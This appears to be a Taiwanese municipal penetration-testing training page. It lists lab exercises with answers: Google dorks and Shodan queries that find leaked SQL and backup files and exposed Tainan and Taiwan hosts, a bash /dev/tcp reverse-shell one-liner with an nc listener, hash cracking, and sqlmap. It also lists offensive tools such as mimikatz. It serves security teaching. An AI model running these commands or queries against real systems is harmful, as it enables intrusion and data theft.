# 臺南市資安攻防人才培訓系列課程 - 系統滲透測試攻擊手法分析 [TOC] :::info 請先了解: - Burpsuite:https://hackercat.org/burp-suite-tutorial/web-pentesting-burp-suite-total-tutorial - kali linux 安裝:https://ithelp.ithome.com.tw/articles/10298620 ::: <!--https://docs.google.com/forms/d/127B0EDTOSvBB1RvHZnRu-khqqxsy14BiBxyxydjkD_o/edit--> # Lab ## [Lab] Google Hacking - 找找看臺灣頂級網域中(.tw),有哪些網站洩漏了副檔名為`.sql`。 :::spoiler 參考解答 site:".tw" filetype:sql ::: - 找找看臺灣頂級網域中(.tw),有哪些網站中洩漏了backup(備份檔案)的網頁索引(index)。 :::spoiler 參考解答 site:".tw" intitle:"index of" intext:"backup" ::: - 思考一下如何利用google hacking找尋特定domain的mail使用者 ### Google Hacking Database - https://www.exploit-db.com/google-hacking-database - https://github.com/readloud/Google-Hacking-Database ## [Lab] shodan 練習 - 找出所有`臺南市`的裝置 :::spoiler 參考解答 city:Tainan ::: - 查找國家為臺灣的開放的 `22 port` :::spoiler 參考解答 country:TW port:22 ::: - 查找國家為臺灣,且開放的`apache httpd`版本為:`2.4.49` :::spoiler 參考解答 country:TW product:"Apache httpd" version:"2.4.49" ::: - 查找國家為臺灣,城市為臺南,port(開放端口)為3389,且有螢幕快照 :::spoiler 參考解答 country:TW city:tainan has_screenshot:true port:"3389" ::: ## [Lab] 拆解 PDF - libreoffice - https://www.libreoffice.org/download/download-libreoffice/ - 取得 `admin3490` 的密碼 - 檔案:https://drive.google.com/file/d/1g4TaRILhtch9bzdWVvQaiN03Jd7K62H5/view?usp=drive_link :::spoiler 參考解答 1. 打開libreoffice,並且匯入檔案 2. 移除黑框 ::: ## [Lab] Reverse shell - 請大家試著在受害機執行 Reverse shell 連回 Kali 機器 情境:Kali 為攻擊機,另一台 linux 為受駭機器,因此我們希望把受害機器的shell反向連回Kali上,以利在kali上操控受駭機器。 :::spoiler 參考解答 1. kali 中輸入 `ifconfig` 或 `ip addr` 確認 ip 2. - Kali:nc -lvnp {PORT} - 受害機器:bash -c 'bash -i >& /dev/tcp/{Kali_IP}/{PORT} 0>&1' ::: ## [Lab] hash 破解 - 字典檔:https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt - 請大家試著破解此段 hash:`0756502edba9f182d85fcfccaf2807c682a3d27d` :::spoiler 參考解答 1. 識別 hash 種類:hashid -j 0756502edba9f182d85fcfccaf2807c682a3d27d 2. ![image](https://hackmd.io/_uploads/ryVv2sxtC.png) 3. `vim hash.txt` 3.1. `i` 3.2. paste 3.3 `esc` `:` `wq` `!` 3.4. enter 4. ![image](https://hackmd.io/_uploads/HyBJTsgFC.png) `Ans: root1234` ::: ## [Lab] sqlmap - https://tryhackme.com/r/room/sqlmap :::spoiler 參考解答 https://medium.com/@prangonbd/sqlmap-tryhackme-d28142b64029 ::: ## [Lab] final Lab - https://tryhackme.com/r/room/easyctf :::spoiler 參考解答 https://medium.com/@skylarphenis/tryhackme-simple-ctf-walk-through-e8bb8c8671a9 ::: ## Open Redirection - `https://facebook.com/l.php?u=http://example.com` ## 其它的 Lab (有興趣可以玩) - 所有的 Lab: https://tryhackme.com/r/hacktivities - Nmap: https://tryhackme.com/r/room/furthernmap - SQL injection: https://tryhackme.com/r/room/sqlinjectionlm - SSRF: https://tryhackme.com/r/room/ssrfhr - Broken Access Control: https://tryhackme.com/r/room/owaspbrokenaccesscontrol - OWASP Top 10 - 2021: https://tryhackme.com/r/room/owasptop102021 <!-- ## [Lab] LFI/Path traversal - https://tryhackme.com/r/room/filepathtraversal ## [Lab] AD - https://github.com/safebuffer/vulnerable-AD --> # Tool ## ip/domian - ipinfo:https://ipinfo.io/ ## wappalyzer 網頁擴充 - https://chromewebstore.google.com/detail/wappalyzer-technology-pro/gppongmhjkpfnbhagpmjfkannfbllamg?hl=zh-TW&pli=1 ## Exploit DB - https://www.exploit-db.com/ ## web check - https://web-check.xyz/ ## [web information leakage](https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Webpage_Content_for_Information_Leakage) - jsfinder:https://github.com/mickeystone/JSFinderPlus - keyhacks:https://github.com/streaak/keyhacks - Google Maps API Scanner:https://github.com/ozguralp/gmapsapiscanner/ - waybackurl:https://github.com/tomnomnom/waybackurls ## shodan - shodan:https://www.shodan.io - filter:https://www.shodan.io/search/filters ## fofa & zoomeye - fofa:https://fofa.info/ - zoomeye:https://www.zoomeye.hk/ ## Subdomain - crt.sh:https://crt.sh/ - dnsdumpster:https://dnsdumpster.com/ - virustotal:https://www.virustotal.com/gui/ ## wpscan - https://wpscan.com/ ## amass - https://github.com/owasp-amass/amass/ ``` In Kali (Root): - apt-get update - apt-get install amass ``` ## Reverse shell Generator - https://www.revshells.com/ ## mimikatz (kali中預設會裝) - https://github.com/ParrotSec/mimikatz # 延伸閱讀: ## 滲透測試學習資源 - 飛飛的 IT 鐵人賽文章:https://ithelp.ithome.com.tw/users/20108446/articles - Cymetrics Tech Blog:https://tech-blog.cymetrics.io/ - HackTricks:https://book.hacktricks.xyz/ - Red Team Notes:https://www.ired.team/ - 3gstudent:https://3gstudent.github.io/ --- ## 其它補充文章 - 資安證照地圖:https://pauljerimy.com/security-certification-roadmap/ - OWASP testing guide:https://owasp.org/www-project-web-security-testing-guide/latest/ - php bypass `disable_funtions`:https://cloud.tencent.com/developer/article/2069788 - 檔案傳輸技巧:https://hackercat.org/pentesting/how-to-transfer-file-from-linux-to-windows - ssh tunneling:https://erev0s.com/blog/ssh-local-remote-and-dynamic-port-forwarding-explain-it-i-am-five/ - 後滲透簡介:https://hackmd.io/@jonafk555/ByAj15D-p - AD 網域滲透測試:https://hackmd.io/@jonafk555/H1SIBUB3C